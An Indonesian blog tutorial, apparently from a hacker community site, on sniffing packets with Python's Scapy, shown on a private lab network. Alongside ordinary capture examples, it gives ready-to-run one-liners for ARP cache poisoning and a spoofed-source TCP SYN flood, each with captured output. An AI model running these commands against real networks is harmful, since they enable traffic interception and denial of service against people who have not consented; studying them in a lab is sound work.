Cara Sniffing di Scapy python | Surabaya Hacker Community

Asslamualaikum wr wb. Oke kali ini saya akan menjelaskan bagaimana cara Sniffing dengan menggunakan scapy.

Scapy adalah program yang dibuat dari bahasa program python dan biasanya digunakan untuk, Sniffing, Manipulasi paket data, Tracerouting, maupun Hacking.

Untuk menginstall Scapy membutuhkan Python 2.x atau Python2.
Tinggal ketik di command line/Terminal anda

tumanganz@shcteam: ~# sudo apt-get install scapy

Setelah menginstall, kalian tinggal jalankan dengan command berikut:

tumanganz@shcteam: ~# scapy

Jika sudah, kalian install. Berhubung topik saat ini adalah Sniffing, maka saya akan memberikan cara untuk Sniffing lewat Scapy. Untuk Sniffing lewat scapy hanya menggunakan command sniff() yang akan mengcapture packet secara terus menerus. Namun jika ingin membatasi packet yang di capture, Maka gunakan command sniff(count=nilai) Semisal sniff(count=10). Simbol (_) di dalam python digunakan untuk nilai terakhir dari paket yang di capture dengan sniff(). Sedangkan hexdraw() digunakan untuk mendecode paket raw data yang masih berupa hexadecimal.

Untuk command sniff()
|---------------------------------------
|>>> sniff()
|Sniffed: TCP:2 UDP:0 ICMP:0 Other:0>
|>>> _.display()
|0000 Ether / IP / TCP 192.168.10.8:1337 > 192.168.10.1:31337 S / Raw
|0001 Ether / IP / TCP 192.168.10.1:31337 > 192.168.10.8:1337 RA / Padding
|>>> _.hexraw()
|0000 04:40:57.016356 Ether / IP / TCP 192.168.10.8:1337 > 192.168.10.1:31337 S / 
\Raw
|0000   70 61 6B 65 74 20 63 69  6E 74 61 2C 20 6A 61 6E   paket cinta, jan
|0010   67 61 6E 20 73 61 6D 70  61 69 20 72 75 73 61 6B   gan sampai rusak
|0020   20 64 69 20 6A 61 6C 61  6E 20 79 61 2E 2E 20 3B    di jalan ya.. ;
|0030   29                                                 )
|0001 04:40:57.016899 Ether / IP / TCP 192.168.10.1:31337 > 192.168.10.8:1337 RA / \Padding
|>>> 
|---------------------------------------

#Arp Cache Poisoning
Scapy memberikan kemudahan dalam melakukan arp cache poisoning dengan menggunakan command arpcachepoisoning(ipkorban, iptarget, interval=1).

>>>arpcachepoison('192.168.10.1', '192.168.10.8', interval=1)

Berikut ini adalah hasil sniff dari scapy untuk menganalisa adanya serangan arp cache poisoning.

|>>> sniff(count=10)
|<Sniffed: TCP:0 UDP:0 ICMP:0 Other:10>
|>>> _.display()
|0000 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0001 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0002 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0003 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0004 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0005 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0006 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0007 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding
|0008 Ether / ARP who has 192.168.10.1 says 192.168.10.8
|0009 Ether / ARP is at 08:00:27:0e:91:2d says 192.168.10.1 / Padding

#TCP SYN Flooding Attack
TCP syn flooding attack merupakan serangan DOS(Denial Of Service) yang diharapkan mampu melumpuhkam server dengan mengirim paket syn secara terus menerus tanpa merespon kembali syn-ack dari server.

                            SYN ---->
 •Attacker   <---- SYN - ack.  •Target
                            SYN ---->

>>>send(IP(src=RandIP('192.168.10.0/24'),dst='192.168.10.1')/TCP(sport=
\RandShort() ,dport=80),count=100)

Berikut hasil sniffing menggunakan scapy, dimana alamat ip dan nomor port seorang attacker di acak.

|>>>sniff(count=10)
|<Sniffed: TCP:8 UDP:0 ICMP:0 Other:2>
|>>> _.display()
|0000 Ether / IP / TCP 192.168.10.212:58199 > 192.168.10.1:www S
|0001 Ether / IP / TCP 192.168.10.253:45480 > 192.168.10.1:www S
|0002 Ether / ARP who has 192.168.10.253 says 192.168.10.1 / Padding
|0003 Ether / IP / TCP 192.168.10.0:44604 > 192.168.10.1:www S
|0004 Ether / IP / TCP 192.168.10.21:7474 > 192.168.10.1:www S
|0005 Ether / ARP who has 192.168.10.21 says 192.168.10.1 / Padding
|0006 Ether / IP / TCP 192.168.10.137:31568 > 192.168.10.1:www S
|0007 Ether / IP / TCP 192.168.10.154:1696 > 192.168.10.1:www S
|0008 Ether / IP / TCP 192.168.10.157:252 > 192.168.10.1:www S
|0009 Ether / IP / TCP 192.168.10.70:12435 > 192.168.10.1:www S
|>>>

Sekian materi tentang Sniffing menggunakan Python, semoga bermanfaat. Terimakasih

Komentar

Posting Komentar

Postingan Populer